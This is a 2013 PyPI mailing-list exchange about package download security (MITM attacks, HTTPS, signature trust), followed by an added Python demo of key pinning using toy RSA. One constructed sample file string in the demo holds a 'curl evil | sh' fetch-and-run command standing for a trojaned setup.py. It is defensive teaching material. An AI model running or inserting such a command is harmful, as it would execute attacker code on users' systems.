[Catalog-sig] Use user-specific site-packages by default?
holger krekel
holger at merlinux.eu
Tue Feb 5 16:41:15 CET 2013
On Tue, Feb 05, 2013 at 10:18 -0500, Donald Stufft wrote:
> On Tuesday, February 5, 2013 at 10:14 AM, holger krekel wrote:
> > Transporting almost all externally reachable packages to be locally pypi
> > served is also kind of a low hanging fruit, although probably slightly
> > higher hanging than SSL :) The point is that we can have some control over
> > those packages once we have them - so we can delete them if they are reported
> > to be malicious independently of maintainer reachability.
> >
>
> We have no way to validate the package we are downloading is the accurate one,
> we should not infer trust/validation that doesn't exist.
MITM attacking any of the many world-wide pypi/easy_install downloads
from external sites is much easier than tampering with a few one-time
downloads (verified against each other) for pypi.python.org's
serving purposes. By contrast, changing client-side tools and
defaults is going to take much longer and will not reach everybody.
IOW, I believe that improving the serving side is good low-hanging
fruit.
> > No, because a signature can only be created by the original author for
> > a particular file (his upload), not from the download site or a
> > MITM-attacker for a different file.
> >
> >
>
> This assumes we know what the correct key is. If we don't then we
> have no way to validate that the signature was created by the author
> and not by someone else. Trust is hard.
Sure, you need sig-validation infrastructure for this.
And sig-validation is a much higher-hanging fruit than using
https on pypi.python.org.
best,
holger
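The two points argued above, that a signature binds one author's key to one particular file, and that it proves nothing unless the client already knows which key is the author's, as an added worked example (not code from the thread, from pip/easy_install or from PyPI). It uses a toy textbook RSA over SHA-256 with no padding, built from well-known Mersenne primes so it runs offline; the author and attacker key pairs, the client functions and the sdist bytes are all constructed for the illustration.

```python
"""Added example: a signature only helps when the verifier already trusts
the right key.  Toy textbook RSA over SHA-256 (no padding) built from
well-known Mersenne primes so it runs offline; illustration only."""
import hashlib

# Assumption: hypothetical author and attacker key pairs; the moduli use
# the Mersenne primes 2^521-1, 2^127-1, 2^607-1 and 2^89-1.
def make_keypair(p, q, e=65537):
    """Return (public, private) for textbook RSA with modulus p*q."""
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))   # modular inverse, Python 3.8+
    return (n, e), (n, d)

def digest_int(data):
    """SHA-256 of the file as an integer (smaller than every modulus used here)."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big")

def sign(priv, data):
    n, d = priv
    return pow(digest_int(data), d, n)

def verify(pub, data, sig):
    n, e = pub
    return pow(sig, e, n) == digest_int(data)

AUTHOR_PUB, AUTHOR_PRIV = make_keypair(2**521 - 1, 2**127 - 1)
MITM_PUB, MITM_PRIV = make_keypair(2**607 - 1, 2**89 - 1)

# Constructed stand-ins for the genuine and the trojaned sdist bytes.
GENUINE_SDIST = b"foo-1.0.tar.gz: setup.py installs the real package"
TROJANED_SDIST = b"foo-1.0.tar.gz: setup.py also runs curl evil | sh"

def author_release():
    """What the maintainer uploads: file, detached signature, public key."""
    return {"file": GENUINE_SDIST,
            "sig": sign(AUTHOR_PRIV, GENUINE_SDIST),
            "key": AUTHOR_PUB}

def mitm_rewrite(release):
    """Attacker on a plaintext http path replaces the file, the signature
    and the key travelling next to them; nothing of the author's copy is kept."""
    return {"file": TROJANED_SDIST,
            "sig": sign(MITM_PRIV, TROJANED_SDIST),
            "key": MITM_PUB}

def install_trusting_bundled_key(download):
    """Naive client: verifies with whatever key arrived alongside the file."""
    return verify(download["key"], download["file"], download["sig"])

def install_with_pinned_key(download, pinned_pub):
    """Client that learned the author's key out of band beforehand."""
    return verify(pinned_pub, download["file"], download["sig"])

def demo():
    clean = author_release()
    tampered = mitm_rewrite(clean)
    return {
        # genuine upload verifies against the pinned author key
        "clean_pinned": install_with_pinned_key(clean, AUTHOR_PUB),
        # the author's signature does not carry over to a different file
        "sig_reused_on_other_file": verify(AUTHOR_PUB, TROJANED_SDIST, clean["sig"]),
        # pinned key: the MITM rewrite is rejected
        "tampered_pinned": install_with_pinned_key(tampered, AUTHOR_PUB),
        # bundled key: the MITM rewrite verifies perfectly
        "tampered_bundled": install_trusting_bundled_key(tampered),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The only difference between the two clients is where the verification key comes from: the one that takes it from the download accepts the attacker's file with a valid signature, which is exactly the "trust that doesn't exist" point; the one with a pinned key rejects it, but only because some out-of-band key distribution (the "sig-validation infrastructure") put that key there first.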